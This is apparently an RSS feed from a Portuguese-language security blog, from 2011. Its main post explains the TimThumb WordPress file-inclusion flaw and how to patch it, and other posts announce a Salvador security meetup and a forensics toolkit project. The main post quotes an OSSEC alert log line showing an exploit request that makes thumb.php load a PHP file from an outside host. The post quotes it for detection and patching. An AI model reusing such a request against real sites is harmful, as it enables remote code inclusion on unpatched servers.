Alexandro Silva's RSS feed

WordPress: Corrigindo vulnerabilidade no timthumb

Fri, 11 Nov 2011 14:38:27 -0200

<a href="http://blog.alexos.com.br/wp-content/uploads/2011/03/internetera-net-wordpress-eye-wallpaper.jpg"><img class="alignright size-medium wp-image-2310" title="internetera-net-wordpress-eye-wallpaper" src="http://blog.alexos.com.br/wp-content/uploads/2011/03/internetera-net-wordpress-eye-wallpaper-300x225.jpg" height="225" alt="" width="300" /></a>Sugiu uma vulnerabilidade no WordPress classificada como alta, a falha foi encontrada no script timthumb presente na maioria dos templates e permite a inclusão de arquivos maliciosos. O Ossec alerta e bloqueia as tentativas de ataque com o objetivo de explorar está vulnerabilidade se a active-response foi habilitada. <blockquote> OSSEC HIDS Notification. 2011 Nov 11 03:29:38 Received From: acme->/var/log/httpd/www.acme.com-access_log Rule: 31151 fired (level 10) -> “Mutiple web server 400 error codes from same source ip.” Portion of the log(s): xx.xxx.xxx.xxx – - [11/Nov/2011:04:29:25 -0200] “GET //wp-content/themes/Quadro/thumb.php?src=http://picasa.com.xpl.be/yahoo.php HTTP/1.1″ 404 232 “-” “Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4″ </blockquote> Para corrigi-la é necessário executar os seguintes passos: 1 . Localizar se o arquivo timthumb.php, thumb.php ou similar que encontra-se no diretório template localizado em /wp-content/themes; 2. Em caso afirmativo substituir todo o código pela nova versão[1] [1] code.google.com/p/timthumb/source/browse/trunk/timthumb.php Maiores informações: blog.ptservidor.pt/seguranca/alerta-de-seguranca-vulnerabilidade-timthumb/ blog.spiderlabs.com/2011/11/wordpress-timthumb-attacks-rising.html markmaunder.com/2011/08/01/zero-day-vulnerability-in-many-wordpress-themes/ <div><h3>See:</h3><ul><li><a href="http://blog.alexos.com.br/?p=2302&#38;lang=pt-br" class="crp_title">Usando o http-wp-plugins do Nmap para detectar plugins do WordPress</a></li><li><a href="http://blog.alexos.com.br/?p=2180&#38;lang=pt-br" class="crp_title">Nessus Viewer</a></li><li><a href="http://blog.alexos.com.br/?p=2770&#38;lang=pt-br" class="crp_title">Conheça o projeto Muffin</a></li><li><a href="http://blog.alexos.com.br/?p=2650&#38;lang=pt-br" class="crp_title">Ossec HIDS – Bloqueando o ZmEu bot e outros Web scanners</a></li><li><a href="http://blog.alexos.com.br/?p=2555&#38;lang=pt-br" class="crp_title">Eventos Segurança da Informação – 2o. semestre 2011</a></li></ul></div>

2o. SSASec Day – Encontro SegInfo de Salvador

Thu, 29 Sep 2011 07:56:14 -0300

O SSASec é um encontro mensal e informal de profissionais, estudantes, pesquisadores, hackers e interessados em geral por segurança da informação, visando a troca de experiência, networking e como uma forma de nos mantermos atualizados sobre os assuntos ligados a área.

Nós estamos promovendo um mini-evento que ocorrerá dia 12/11 ( sábado ) das 09 às 12 no auditório da Faculdade Rui Barbosa localizada no Rio Vermelho.

Agenda:
Dia: 12/11 ( sábado )
Horário: 09 às 12
Local: Faculdade Rui Barbosa – Rio Vermelho

Palestras
Segurança da Informação – Por onde começar? – Alexandro Silva ( DCLabs )
Segurança de infrastrutura – DNSSec – Ítalo Valcy ( POP/UFBA )
Por trás das pesquisas em Segurança da Informação – Rick ( Corelan ) e AndersonC0d3 ( Hack’n Roll )

Não haverá inscrição, é só ir e se divertir!!

See:

2o. SSASec Day – Encontro SegInfo de Salvador

Thu, 29 Sep 2011 07:56:14 -0300

Nós estamos promovendo um mini-evento que ocorrerá dia 12/11 ( sábado ) das 09 às 12 no auditório da Faculdade Rui Barbosa localizada no Rio Vermelho.

Agenda:
Dia: 12/11 ( sábado )
Horário: 09 às 12
Local: Faculdade Rui Barbosa – Rio Vermelho

Não haverá inscrição, é só ir e se divertir!!

See:

1o. Encontro SegInfo de Salvador – SSASec Day

Wed, 28 Sep 2011 23:54:47 -0300

Nós estamos promovendo um mini-evento que ocorrerá dia 12/11 ( sábado ) das 09 às 12 no auditório da Faculdade Rui Barbosa localizada no Rio Vermelho.

Agenda:
Dia: 12/11 ( sábado )
Horário: 09 às 12
Local: Faculdade Rui Barbosa – Rio Vermelho

Não haverá inscrição, é só ir e se divertir!!

See:

Conheça o projeto Muffin

Sat, 10 Sep 2011 00:59:37 -0300

O Muffin é um dos projetos do grande Tony Rodrigues, ele é um Incident Response Toolkit (Master Unit For Forensics INvestigations) e dá suporte a criação de pendrives com ferramentas que ajuda na coleta de informações voláteis.

Ela está sendo desenvolvida em Pascal com SQLlite usando o Lazarus e é composto por 3 módulos:

O pendrive MUFFIN, que é a toolkit propriamente dita;
O MUFFIN Baker, uma ferramenta que permite configurar e gerar o pendrive MUFFIN;
O MUFFIN Report, que vai acessar os dados gerados/coletados pelo pendrive MUFFIN.

O chamado:

“Estamos precisando de colaboradores. Se você conhece de programação e pode nos ajudar, entre em contato. Se você não conhece, mas ainda assim quer ajudar no projeto, excelente. Há muito trabalho e todos são bem vindos.”

Informações:

http://code.google.com/p/muffin-project/

https://code.google.com/p/muffin-project/source/browse/trunk/SETUP-Desenvolvimento.txt?spec=svn30&r=30

Você que é interessado em análise forense e está disposto a dedicar um pouco do seu tempo convido a participar de um projeto promissor e empolgante com um time super gente fina.

Conheça a @OctaneLabs